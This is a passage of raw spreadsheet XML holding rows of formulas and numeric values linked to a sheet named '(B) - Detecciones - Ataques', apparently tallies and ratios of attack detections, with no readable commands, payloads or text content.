        <f>'(B) - Detecciones - Ataques'!EC60</f>
        <v>0</v>
      </c>
      <c r="P68" s="281">
        <f>'(B) - Detecciones - Ataques'!ED60</f>
        <v>0</v>
      </c>
      <c r="Q68" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL68" s="287" t="s">
        <v>1139</v>
      </c>
      <c r="AM68" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN68" s="275">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AO68" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP68" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ68" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS68" s="287" t="s">
        <v>1139</v>
      </c>
      <c r="AT68" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU68" s="275">
        <f t="shared" si="15"/>
        <v>1</v>
      </c>
      <c r="AV68" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW68" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX68" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="60.0" customHeight="1">
      <c r="B69" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C69" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D69" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E69" s="145" t="s">
        <v>712</v>
      </c>
      <c r="F69" s="280">
        <f>'(B) - Detecciones - Ataques'!P61</f>
        <v>1</v>
      </c>
      <c r="G69" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ61</f>
        <v>1</v>
      </c>
      <c r="H69" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ61</f>
        <v>1</v>
      </c>
      <c r="I69" s="271">
        <f>'(B) - Detecciones - Ataques'!AS61</f>
        <v>0</v>
      </c>
      <c r="J69" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ61</f>
        <v>0</v>
      </c>
      <c r="K69" s="271">
        <f>'(B) - Detecciones - Ataques'!BP61</f>
        <v>1</v>
      </c>
      <c r="L69" s="281">
        <f>'(B) - Detecciones - Ataques'!BW61</f>
        <v>1</v>
      </c>
      <c r="M69" s="271">
        <f>'(B) - Detecciones - Ataques'!CM61</f>
        <v>1</v>
      </c>
      <c r="N69" s="281">
        <f>'(B) - Detecciones - Ataques'!CT61</f>
        <v>1</v>
      </c>
      <c r="O69" s="280">
        <f>'(B) - Detecciones - Ataques'!EC61</f>
        <v>0</v>
      </c>
      <c r="P69" s="281">
        <f>'(B) - Detecciones - Ataques'!ED61</f>
        <v>0</v>
      </c>
      <c r="Q69" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL69" s="287" t="s">
        <v>1150</v>
      </c>
      <c r="AM69" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN69" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO69" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP69" s="275">
        <f t="shared" si="12"/>
        <v>1</v>
      </c>
      <c r="AQ69" s="285">
        <f t="shared" si="13"/>
        <v>1</v>
      </c>
      <c r="AS69" s="287" t="s">
        <v>1150</v>
      </c>
      <c r="AT69" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU69" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV69" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW69" s="275">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="AX69" s="285">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="70" ht="60.0" customHeight="1">
      <c r="B70" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C70" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D70" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E70" s="145" t="s">
        <v>720</v>
      </c>
      <c r="F70" s="280">
        <f>'(B) - Detecciones - Ataques'!P62</f>
        <v>1</v>
      </c>
      <c r="G70" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ62</f>
        <v>0</v>
      </c>
      <c r="H70" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ62</f>
        <v>0</v>
      </c>
      <c r="I70" s="271">
        <f>'(B) - Detecciones - Ataques'!AS62</f>
        <v>0</v>
      </c>
      <c r="J70" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ62</f>
        <v>0</v>
      </c>
      <c r="K70" s="271">
        <f>'(B) - Detecciones - Ataques'!BP62</f>
        <v>0</v>
      </c>
      <c r="L70" s="281">
        <f>'(B) - Detecciones - Ataques'!BW62</f>
        <v>0</v>
      </c>
      <c r="M70" s="271">
        <f>'(B) - Detecciones - Ataques'!CM62</f>
        <v>0</v>
      </c>
      <c r="N70" s="281">
        <f>'(B) - Detecciones - Ataques'!CT62</f>
        <v>0</v>
      </c>
      <c r="O70" s="280">
        <f>'(B) - Detecciones - Ataques'!EC62</f>
        <v>0</v>
      </c>
      <c r="P70" s="281">
        <f>'(B) - Detecciones - Ataques'!ED62</f>
        <v>0</v>
      </c>
      <c r="Q70" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL70" s="287" t="s">
        <v>1156</v>
      </c>
      <c r="AM70" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN70" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO70" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP70" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ70" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS70" s="287" t="s">
        <v>1156</v>
      </c>
      <c r="AT70" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU70" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV70" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW70" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX70" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="71" ht="60.0" customHeight="1">
      <c r="B71" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C71" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D71" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E71" s="145" t="s">
        <v>726</v>
      </c>
      <c r="F71" s="280">
        <f>'(B) - Detecciones - Ataques'!P63</f>
        <v>1</v>
      </c>
      <c r="G71" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ63</f>
        <v>0</v>
      </c>
      <c r="H71" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ63</f>
        <v>0</v>
      </c>
      <c r="I71" s="271">
        <f>'(B) - Detecciones - Ataques'!AS63</f>
        <v>0</v>
      </c>
      <c r="J71" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ63</f>
        <v>0</v>
      </c>
      <c r="K71" s="271">
        <f>'(B) - Detecciones - Ataques'!BP63</f>
        <v>0</v>
      </c>
      <c r="L71" s="281">
        <f>'(B) - Detecciones - Ataques'!BW63</f>
        <v>0</v>
      </c>
      <c r="M71" s="271">
        <f>'(B) - Detecciones - Ataques'!CM63</f>
        <v>0</v>
      </c>
      <c r="N71" s="281">
        <f>'(B) - Detecciones - Ataques'!CT63</f>
        <v>0</v>
      </c>
      <c r="O71" s="280">
        <f>'(B) - Detecciones - Ataques'!EC63</f>
        <v>0</v>
      </c>
      <c r="P71" s="281">
        <f>'(B) - Detecciones - Ataques'!ED63</f>
        <v>0</v>
      </c>
      <c r="Q71" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL71" s="287" t="s">
        <v>1166</v>
      </c>
      <c r="AM71" s="275">
        <f t="shared" si="9"/>
        <v>72031</v>
      </c>
      <c r="AN71" s="275">
        <f t="shared" si="10"/>
        <v>125</v>
      </c>
      <c r="AO71" s="284">
        <f t="shared" si="11"/>
        <v>0.001735363941</v>
      </c>
      <c r="AP71" s="275">
        <f t="shared" si="12"/>
        <v>213</v>
      </c>
      <c r="AQ71" s="285">
        <f t="shared" si="13"/>
        <v>0.002957060155</v>
      </c>
      <c r="AS71" s="287" t="s">
        <v>1166</v>
      </c>
      <c r="AT71" s="275">
        <f t="shared" si="14"/>
        <v>72031</v>
      </c>
      <c r="AU71" s="275">
        <f t="shared" si="15"/>
        <v>125</v>
      </c>
      <c r="AV71" s="284">
        <f t="shared" si="21"/>
        <v>0.001735363941</v>
      </c>
      <c r="AW71" s="275">
        <f t="shared" si="17"/>
        <v>213</v>
      </c>
      <c r="AX71" s="285">
        <f t="shared" si="18"/>
        <v>0.002957060155</v>
      </c>
    </row>
    <row r="72" ht="60.0" customHeight="1">
      <c r="B72" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C72" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D72" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E72" s="145" t="s">
        <v>733</v>
      </c>
      <c r="F72" s="280">
        <f>'(B) - Detecciones - Ataques'!P64</f>
        <v>1</v>
      </c>
      <c r="G72" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ64</f>
        <v>0</v>
      </c>
      <c r="H72" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ64</f>
        <v>0</v>
      </c>
      <c r="I72" s="271">
        <f>'(B) - Detecciones - Ataques'!AS64</f>
        <v>0</v>
      </c>
      <c r="J72" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ64</f>
        <v>0</v>
      </c>
      <c r="K72" s="271">
        <f>'(B) - Detecciones - Ataques'!BP64</f>
        <v>0</v>
      </c>
      <c r="L72" s="281">
        <f>'(B) - Detecciones - Ataques'!BW64</f>
        <v>0</v>
      </c>
      <c r="M72" s="271">
        <f>'(B) - Detecciones - Ataques'!CM64</f>
        <v>0</v>
      </c>
      <c r="N72" s="281">
        <f>'(B) - Detecciones - Ataques'!CT64</f>
        <v>0</v>
      </c>
      <c r="O72" s="280">
        <f>'(B) - Detecciones - Ataques'!EC64</f>
        <v>0</v>
      </c>
      <c r="P72" s="281">
        <f>'(B) - Detecciones - Ataques'!ED64</f>
        <v>0</v>
      </c>
      <c r="Q72" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL72" s="287" t="s">
        <v>1202</v>
      </c>
      <c r="AM72" s="275">
        <f t="shared" si="9"/>
        <v>1002</v>
      </c>
      <c r="AN72" s="275">
        <f t="shared" si="10"/>
        <v>44</v>
      </c>
      <c r="AO72" s="284">
        <f t="shared" si="11"/>
        <v>0.04391217565</v>
      </c>
      <c r="AP72" s="275">
        <f t="shared" si="12"/>
        <v>6</v>
      </c>
      <c r="AQ72" s="285">
        <f t="shared" si="13"/>
        <v>0.005988023952</v>
      </c>
      <c r="AS72" s="287" t="s">
        <v>1202</v>
      </c>
      <c r="AT72" s="275">
        <f t="shared" si="14"/>
        <v>1002</v>
      </c>
      <c r="AU72" s="275">
        <f t="shared" si="15"/>
        <v>44</v>
      </c>
      <c r="AV72" s="284">
        <f t="shared" si="21"/>
        <v>0.04391217565</v>
      </c>
      <c r="AW72" s="275">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="AX72" s="285">
        <f t="shared" si="18"/>
        <v>0.005988023952</v>
      </c>
    </row>
    <row r="73" ht="60.0" customHeight="1">
      <c r="B73" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C73" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D73" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E73" s="145" t="s">
        <v>739</v>
      </c>
      <c r="F73" s="280">
        <f>'(B) - Detecciones - Ataques'!P65</f>
        <v>80218</v>
      </c>
      <c r="G73" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ65</f>
        <v>1</v>
      </c>
      <c r="H73" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ65</f>
        <v>0.00001246603007</v>
      </c>
      <c r="I73" s="271">
        <f>'(B) - Detecciones - Ataques'!AS65</f>
        <v>0</v>
      </c>
      <c r="J73" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ65</f>
        <v>0</v>
      </c>
      <c r="K73" s="271">
        <f>'(B) - Detecciones - Ataques'!BP65</f>
        <v>0</v>
      </c>
      <c r="L73" s="281">
        <f>'(B) - Detecciones - Ataques'!BW65</f>
        <v>0</v>
      </c>
      <c r="M73" s="271">
        <f>'(B) - Detecciones - Ataques'!CM65</f>
        <v>1</v>
      </c>
      <c r="N73" s="281">
        <f>'(B) - Detecciones - Ataques'!CT65</f>
        <v>0.00001246603007</v>
      </c>
      <c r="O73" s="280">
        <f>'(B) - Detecciones - Ataques'!EC65</f>
        <v>350</v>
      </c>
      <c r="P73" s="281">
        <f>'(B) - Detecciones - Ataques'!ED65</f>
        <v>0.004363110524</v>
      </c>
      <c r="Q73" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL73" s="287" t="s">
        <v>1217</v>
      </c>
      <c r="AM73" s="275">
        <f t="shared" si="9"/>
        <v>41</v>
      </c>
      <c r="AN73" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO73" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP73" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ73" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS73" s="287" t="s">
        <v>1217</v>
      </c>
      <c r="AT73" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU73" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV73" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW73" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX73" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="74" ht="60.0" customHeight="1">
      <c r="B74" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C74" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D74" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E74" s="145" t="s">
        <v>748</v>
      </c>
      <c r="F74" s="280">
        <f>'(B) - Detecciones - Ataques'!P66</f>
        <v>1</v>
      </c>
      <c r="G74" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ66</f>
        <v>0</v>
      </c>
      <c r="H74" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ66</f>
        <v>0</v>
      </c>
      <c r="I74" s="271">
        <f>'(B) - Detecciones - Ataques'!AS66</f>
        <v>0</v>
      </c>
      <c r="J74" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ66</f>
        <v>0</v>
      </c>
      <c r="K74" s="271">
        <f>'(B) - Detecciones - Ataques'!BP66</f>
        <v>0</v>
      </c>
      <c r="L74" s="281">
        <f>'(B) - Detecciones - Ataques'!BW66</f>
        <v>0</v>
      </c>
      <c r="M74" s="271">
        <f>'(B) - Detecciones - Ataques'!CM66</f>
        <v>0</v>
      </c>
      <c r="N74" s="281">
        <f>'(B) - Detecciones - Ataques'!CT66</f>
        <v>0</v>
      </c>
      <c r="O74" s="280">
        <f>'(B) - Detecciones - Ataques'!EC66</f>
        <v>0</v>
      </c>
      <c r="P74" s="281">
        <f>'(B) - Detecciones - Ataques'!ED66</f>
        <v>0</v>
      </c>
      <c r="Q74" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL74" s="287" t="s">
        <v>1225</v>
      </c>
      <c r="AM74" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN74" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO74" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP74" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ74" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS74" s="287" t="s">
        <v>1225</v>
      </c>
      <c r="AT74" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU74" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV74" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW74" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX74" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="60.0" customHeight="1">
      <c r="B75" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C75" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D75" s="143" t="s">
        <v>674</v>
      </c>
      <c r="E75" s="145" t="s">
        <v>753</v>
      </c>
      <c r="F75" s="280">
        <f>'(B) - Detecciones - Ataques'!P67</f>
        <v>1</v>
      </c>
      <c r="G75" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ67</f>
        <v>0</v>
      </c>
      <c r="H75" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ67</f>
        <v>0</v>
      </c>
      <c r="I75" s="271">
        <f>'(B) - Detecciones - Ataques'!AS67</f>
        <v>0</v>
      </c>
      <c r="J75" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ67</f>
        <v>0</v>
      </c>
      <c r="K75" s="271">
        <f>'(B) - Detecciones - Ataques'!BP67</f>
        <v>0</v>
      </c>
      <c r="L75" s="281">
        <f>'(B) - Detecciones - Ataques'!BW67</f>
        <v>0</v>
      </c>
      <c r="M75" s="271">
        <f>'(B) - Detecciones - Ataques'!CM67</f>
        <v>0</v>
      </c>
      <c r="N75" s="281">
        <f>'(B) - Detecciones - Ataques'!CT67</f>
        <v>0</v>
      </c>
      <c r="O75" s="280">
        <f>'(B) - Detecciones - Ataques'!EC67</f>
        <v>0</v>
      </c>
      <c r="P75" s="281">
        <f>'(B) - Detecciones - Ataques'!ED67</f>
        <v>0</v>
      </c>
      <c r="Q75" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL75" s="287" t="s">
        <v>1236</v>
      </c>
      <c r="AM75" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN75" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO75" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP75" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ75" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS75" s="287" t="s">
        <v>1236</v>
      </c>
      <c r="AT75" s="275">
        <f t="shared" si="14"/>
        <v>1</v>
      </c>
      <c r="AU75" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV75" s="284">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="AW75" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX75" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="60.0" customHeight="1">
      <c r="B76" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C76" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D76" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E76" s="145" t="s">
        <v>762</v>
      </c>
      <c r="F76" s="280">
        <f>'(B) - Detecciones - Ataques'!P68</f>
        <v>1</v>
      </c>
      <c r="G76" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ68</f>
        <v>0</v>
      </c>
      <c r="H76" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ68</f>
        <v>0</v>
      </c>
      <c r="I76" s="271">
        <f>'(B) - Detecciones - Ataques'!AS68</f>
        <v>0</v>
      </c>
      <c r="J76" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ68</f>
        <v>0</v>
      </c>
      <c r="K76" s="271">
        <f>'(B) - Detecciones - Ataques'!BP68</f>
        <v>0</v>
      </c>
      <c r="L76" s="281">
        <f>'(B) - Detecciones - Ataques'!BW68</f>
        <v>0</v>
      </c>
      <c r="M76" s="271">
        <f>'(B) - Detecciones - Ataques'!CM68</f>
        <v>0</v>
      </c>
      <c r="N76" s="281">
        <f>'(B) - Detecciones - Ataques'!CT68</f>
        <v>0</v>
      </c>
      <c r="O76" s="280">
        <f>'(B) - Detecciones - Ataques'!EC68</f>
        <v>0</v>
      </c>
      <c r="P76" s="281">
        <f>'(B) - Detecciones - Ataques'!ED68</f>
        <v>0</v>
      </c>
      <c r="Q76" s="282" t="s">
        <v>112</v>
      </c>
      <c r="AL76" s="287" t="s">
        <v>1247</v>
      </c>
      <c r="AM76" s="275">
        <f t="shared" si="9"/>
        <v>17</v>
      </c>
      <c r="AN76" s="275">
        <f t="shared" si="10"/>
        <v>17</v>
      </c>
      <c r="AO76" s="284">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
      <c r="AP76" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ76" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS76" s="287" t="s">
        <v>1247</v>
      </c>
      <c r="AT76" s="275">
        <f t="shared" si="14"/>
        <v>16</v>
      </c>
      <c r="AU76" s="275">
        <f t="shared" si="15"/>
        <v>16</v>
      </c>
      <c r="AV76" s="284">
        <f t="shared" si="21"/>
        <v>1</v>
      </c>
      <c r="AW76" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX76" s="285">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="60.0" customHeight="1">
      <c r="B77" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C77" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D77" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E77" s="145" t="s">
        <v>772</v>
      </c>
      <c r="F77" s="280">
        <f>'(B) - Detecciones - Ataques'!P69</f>
        <v>1</v>
      </c>
      <c r="G77" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ69</f>
        <v>0</v>
      </c>
      <c r="H77" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ69</f>
        <v>0</v>
      </c>
      <c r="I77" s="271">
        <f>'(B) - Detecciones - Ataques'!AS69</f>
        <v>0</v>
      </c>
      <c r="J77" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ69</f>
        <v>0</v>
      </c>
      <c r="K77" s="271">
        <f>'(B) - Detecciones - Ataques'!BP69</f>
        <v>0</v>
      </c>
      <c r="L77" s="281">
        <f>'(B) - Detecciones - Ataques'!BW69</f>
        <v>0</v>
      </c>
      <c r="M77" s="271">
        <f>'(B) - Detecciones - Ataques'!CM69</f>
        <v>0</v>
      </c>
      <c r="N77" s="281">
        <f>'(B) - Detecciones - Ataques'!CT69</f>
        <v>0</v>
      </c>
      <c r="O77" s="280">
        <f>'(B) - Detecciones - Ataques'!EC69</f>
        <v>0</v>
      </c>
      <c r="P77" s="281">
        <f>'(B) - Detecciones - Ataques'!ED69</f>
        <v>0</v>
      </c>
      <c r="Q77" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL77" s="287" t="s">
        <v>1278</v>
      </c>
      <c r="AM77" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN77" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO77" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP77" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ77" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS77" s="287" t="s">
        <v>1278</v>
      </c>
      <c r="AT77" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU77" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV77" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW77" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX77" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="78" ht="60.0" customHeight="1">
      <c r="B78" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C78" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D78" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E78" s="145" t="s">
        <v>776</v>
      </c>
      <c r="F78" s="280">
        <f>'(B) - Detecciones - Ataques'!P70</f>
        <v>1</v>
      </c>
      <c r="G78" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ70</f>
        <v>0</v>
      </c>
      <c r="H78" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ70</f>
        <v>0</v>
      </c>
      <c r="I78" s="271">
        <f>'(B) - Detecciones - Ataques'!AS70</f>
        <v>0</v>
      </c>
      <c r="J78" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ70</f>
        <v>0</v>
      </c>
      <c r="K78" s="271">
        <f>'(B) - Detecciones - Ataques'!BP70</f>
        <v>0</v>
      </c>
      <c r="L78" s="281">
        <f>'(B) - Detecciones - Ataques'!BW70</f>
        <v>0</v>
      </c>
      <c r="M78" s="271">
        <f>'(B) - Detecciones - Ataques'!CM70</f>
        <v>0</v>
      </c>
      <c r="N78" s="281">
        <f>'(B) - Detecciones - Ataques'!CT70</f>
        <v>0</v>
      </c>
      <c r="O78" s="280">
        <f>'(B) - Detecciones - Ataques'!EC70</f>
        <v>0</v>
      </c>
      <c r="P78" s="281">
        <f>'(B) - Detecciones - Ataques'!ED70</f>
        <v>0</v>
      </c>
      <c r="Q78" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL78" s="287" t="s">
        <v>1289</v>
      </c>
      <c r="AM78" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN78" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO78" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP78" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ78" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS78" s="287" t="s">
        <v>1289</v>
      </c>
      <c r="AT78" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU78" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV78" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW78" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX78" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="79" ht="60.0" customHeight="1">
      <c r="B79" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C79" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D79" s="143" t="s">
        <v>756</v>
      </c>
      <c r="E79" s="145" t="s">
        <v>780</v>
      </c>
      <c r="F79" s="280">
        <f>'(B) - Detecciones - Ataques'!P71</f>
        <v>1</v>
      </c>
      <c r="G79" s="280">
        <f>'(B) - Detecciones - Ataques'!DJ71</f>
        <v>0</v>
      </c>
      <c r="H79" s="281">
        <f>'(B) - Detecciones - Ataques'!DQ71</f>
        <v>0</v>
      </c>
      <c r="I79" s="271">
        <f>'(B) - Detecciones - Ataques'!AS71</f>
        <v>0</v>
      </c>
      <c r="J79" s="281">
        <f>'(B) - Detecciones - Ataques'!AZ71</f>
        <v>0</v>
      </c>
      <c r="K79" s="271">
        <f>'(B) - Detecciones - Ataques'!BP71</f>
        <v>0</v>
      </c>
      <c r="L79" s="281">
        <f>'(B) - Detecciones - Ataques'!BW71</f>
        <v>0</v>
      </c>
      <c r="M79" s="271">
        <f>'(B) - Detecciones - Ataques'!CM71</f>
        <v>0</v>
      </c>
      <c r="N79" s="281">
        <f>'(B) - Detecciones - Ataques'!CT71</f>
        <v>0</v>
      </c>
      <c r="O79" s="280">
        <f>'(B) - Detecciones - Ataques'!EC71</f>
        <v>0</v>
      </c>
      <c r="P79" s="281">
        <f>'(B) - Detecciones - Ataques'!ED71</f>
        <v>0</v>
      </c>
      <c r="Q79" s="282" t="s">
        <v>13</v>
      </c>
      <c r="AL79" s="287" t="s">
        <v>1300</v>
      </c>
      <c r="AM79" s="275">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AN79" s="275">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AO79" s="284">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="AP79" s="275">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="AQ79" s="285">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="AS79" s="287" t="s">
        <v>1300</v>
      </c>
      <c r="AT79" s="275">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="AU79" s="275">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="AV79" s="284" t="str">
        <f t="shared" si="21"/>
        <v>-</v>
      </c>
      <c r="AW79" s="275">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="AX79" s="285" t="str">
        <f t="shared" si="18"/>
        <v>-</v>
      </c>
    </row>
    <row r="80" ht="60.0" customHeight="1">
      <c r="B80" s="142" t="s">
        <v>658</v>
      </c>
      <c r="C80" s="143" t="s">
        <v>12</v>
      </c>
      <c r="D80" s="143" t="s">
        <v>756</v>
